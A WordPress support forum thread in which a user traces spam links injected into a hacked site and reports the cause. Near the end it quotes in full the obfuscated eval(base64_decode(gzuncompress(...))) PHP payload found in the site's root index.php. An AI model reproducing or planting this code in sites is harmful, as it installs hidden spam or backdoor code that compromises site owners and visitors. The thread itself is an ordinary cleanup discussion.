Are you using the same template?
Also, could we have a link to the site?
upgrading a hacked site doesnt make you less hacked, or unhacked.
theres a process for dealing with hacked sites thats been covered over and over again on the forums.
http://wordpress.org/search/hacked?forums=1
If youre willing to invest $$, there are ppl that can do this for you.
code in the footer is typically caused by by a maliciously coded plugin that is hooking into the wp_footer fucntion, btw. its very rarely a theme issue, rjmastey, and ‘seeing the site’ wont really help anything.
whooami, I ask because some freelance template authors add their own backlinks to their distributables by different methods. It’s also an easier first step than jumping to malicious plugins and “spend money”.
what the OP provided is not indicative of what is generally seen in any themes, and if you read, you’ll notice the classic theme is also mentioned.
i’m very frank about the inability of most people to properly take care of hacked sites — I see it ALL OF THE TIME, and Im sorry if you think im being premature, but Ive got quite a bit of experience in that regard.
Then again are you suggesting that the only way the user can rectify the problem due to his in-experience is to pay to have someone else fix the problem, rather then offer some straight-forward advice on what he could do to resolve the problem?
It could be any number of things causing the problem at the moment…
We can only really speculate based on the information to be fair..
It could malicious code in the theme (though unlikely).
It could be a poor host that doesn’t secure the server thus resulting in malicious scripts being placed into pages.
It could be a poorly written plugin that’s being exploited.
It could be a WP exploit.
Sure there’s a few more other possibilities to, perhaps quite a few more…..
My suggestion would be to install WP locally (WAMP or equivalent), create a backup of the existing site, restore the backup onto the local install.
Access the local install and see if the script is getting inserted into the page…
That will eliminate one factor, then move on and eliminate another, until you isolate the problem.
I do agree in one sense with whooaim though, if you don’t know how to fix the problem, then it’s pretty much up to some kind soul sitting here explaining the whole process of how to isolate the issue, or you can employ someone to fix it for you.
Then again are you suggesting that the only way the user can rectify the problem due to his in-experience is to pay to have someone else fix the problem, rather then offer some straight-forward advice on what he could do to resolve the problem?
uh, no. did you miss the link to the HUNDREDS of other threads where this is covered ad nauseum? Why should anyone have to regurgitate whats already been covered elsewhere? Heres a big clue: that straight-forward advice already exists here.
some kind soul sitting here explaining the whole process of how to isolate the issue ..
Thats unreasonable, to be honest. There are various and multiple security issues with some early wordpress versions… — besides which, attempts at doing just that, are already here.. Ive already linked to them.
Thread Starter
dayer
(@dayer)
@rjmastey: I have tried with other templates, and it’s the same.
@whooami: but although I disabled the wp_footer() call, the spam appear also. With wp_footer() enable the code appear just above of </body>, and it I disable wp_footer() call them the code appear just under of <body> label.
I think that wp_footer() influences, but it isn’t the only sentence that invokes.
Dayer, install WordPress locally using WAMP or similar (google it if you don’t know what i mean), and create a backup of your website, recreate the MYSQL database and user on the local install then use the backup to re-create a virtual ‘per say’ install locally and see if the script still gets inserted into the pages.
If it does, then that rules out the host, and the bad code is local to your files, ie. it’s been inserted into the database or directly into your WordPress files or Theme.
If not, then there’s a problem on the host’s server, and there’s lots of reasons such a thing could happen, from something of your doing, or theirs (or a lack of them securing the server appropriately).
I can only speculate at this point..
Thread Starter
dayer
(@dayer)
Hi all! I have solved the problem. I had replaced all files, but not the index.php of the root of my site! And this file had at the end this line:
eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCJnenVuY29tcHJlc3MiKSlldmFsKGd6dW5jb21wcmVzcyhiYXNlNjRfZGVjb2RlKCJlSnlsVmZ0djRrWVEvbGVjdWVodXQvSFp3S1hWSGRTaEVYVU9xWUZFeEtrcUFXY1pzd2JyL09wNk9jS1YvTytkWFQ5d1NIS3ExSjlzeitPYjF6ZmpNQ0FuTE03RWpweTZuMjFuQ3E2N2hEbWxqUE9VdTV4bEtSZGhzaUsyZTNsOVRYdW5EKzJPbFM3Y0ZSTnV4TDZ4aU5CKytlbEh6RXNJN1FaZWxMTWVDblBoY1VGb1R5bzRmZ2pmODllTUtCREw0OXpiRVJpTUhiQXVBSFFZNHBOVW1kelprei90eVJTS3B6dStITm1ZMUg2dlpaeXQzQmloMWdUZWZKbTIzbithR2ZPejB6ZWd2K2JVZjBYUlBjaUhqblByRG0vdUhGbTR6RzRLbjJGdXdWcUlyR3VhMiszV2lOSnZMRWg1d0VPV0xITWpZY0xNVjJaL25lYkNBbVBESTViNDZaSVI1VHhFbkFMR0dkMGlFQmM4ak1reTVJa1hNeUt3U0h3aDRIeTR4YnBGbkFHbE9waXpHVkFEVEREaTVjOHY0SXdRNkxjZ2pGZ3N3cmdNcE9CcEx6ek1zSEo3KzFZako5TGFaUTloTHZLbVBiYVJxQ0ZwbG1VMTRKV0NLSFQ2WG1zcUxqNjBXcFRTZnpCUXNFbDhFYVpKaFFzK0Z1K0dTU2lnTUNnaURURGJXa09xbGtvTUpjMlpTRE5SbStxRCs4bjF6YTNqRHUzTDMrMkoza0xTL01oc1lqdjNrN0V6dVJ6ZlhhRjV1K3lTSkZNWmxqMHd2L1lyMGZ3b3pWbEQrUGpJc0FrdjFSVGtxZjgxelZnaWE2cjVrQ0dMbVl0SWgzcDZkY0ZYYUZDN0Vkd0hTWTNGVGsyOE1wK0NGS0tiL3JHbEs2RTl4cXFLdHp0OGE2c3VCMXNlQ2xiRDZvQjdxWUZCR2lOV1lKa24xcExneUpudU02bWhQYlAvZThQNFRqbEFGL3BnUE5jWWFoWE10dEdhOFZrQ2hnWkRUTGpiTkMwcU1LQXlHS1JKd2xUM3VnUFpYeWxYT3RyYnJwRi95RUtXQm5VeFZUL1ZxRFREQ3JCVCthSFVkdWNqemlWb1RPcXEzb0ZpdWhXLzVGN2xnbWRwNmEyME9oekMweFBMVWl6djU1c0ZXamJOYWdqdFREdW5YWUNLREkza3JERE9Jcm5TZUp6a0lqVkkzSHZFc1RjdmtVa3dRT2lMZlpLSzBHZjdyY2NUUEpwN2RVVDNnU2U4aUpvaDZBZjBKMzJ3QUJRa2h1aWNXNEZpMEdGZmRkZ3V6a0FSSTBKK0tTUDkrbWJ3aDJ2L1JYczFXVkM0K3U2bk1lYVZOM3VDNlI3NzNZOVJWdlc0YzE0WC80TVUrT0xWREo3VzhYVG9DSDQ4Y002OFpZRnczdnIwQzhadStLKys0eWErVU1KL3FTQjg1VWVHUHlJODJXNFFiZkkxL250a29Wb3BLLzlZYW9tTGczaWlEbUtudUdTTkNiL2JrMS9OUmJyY1hkQjkrRTdPc1ZNTWN6UTZuaVV5UWY0Mkk4OHZLU05OcHUyNTNteURkcXpwWUFubE5Ub0tLNk5PdjF6TWYvcS9vY3VQS25pOUNWWG9KcElVUHpHVUZQSFhhVk95U2ZBOHl6aFZUbklPL3dLK0c0ZUQiKSkpOw=="));
I don’t know how someone has could edit this file, but I’m going to see the attributes of each folder and search advices about permissions.
Thank you people π
I have the same problem for wwsmag.com/updates which is my website, if you go on the bottom, there are a lot of viagra and bs spam.. how the hell do i get rid of that???????? HELP!!!!
Thanks for identifying index.php as the location of the spam junk. I had the same problem and couldn’t find where the spam was located. I highly recommend anyone that finds junk spam at the end of a code validation check to check their index.php
usually if you find spam in your footer.php or index.php and delete it, that does not fix your problem. The problem goes deeper, and that stuff will most likely come back.
http://codex.wordpress.org/FAQ_My_site_was_hacked
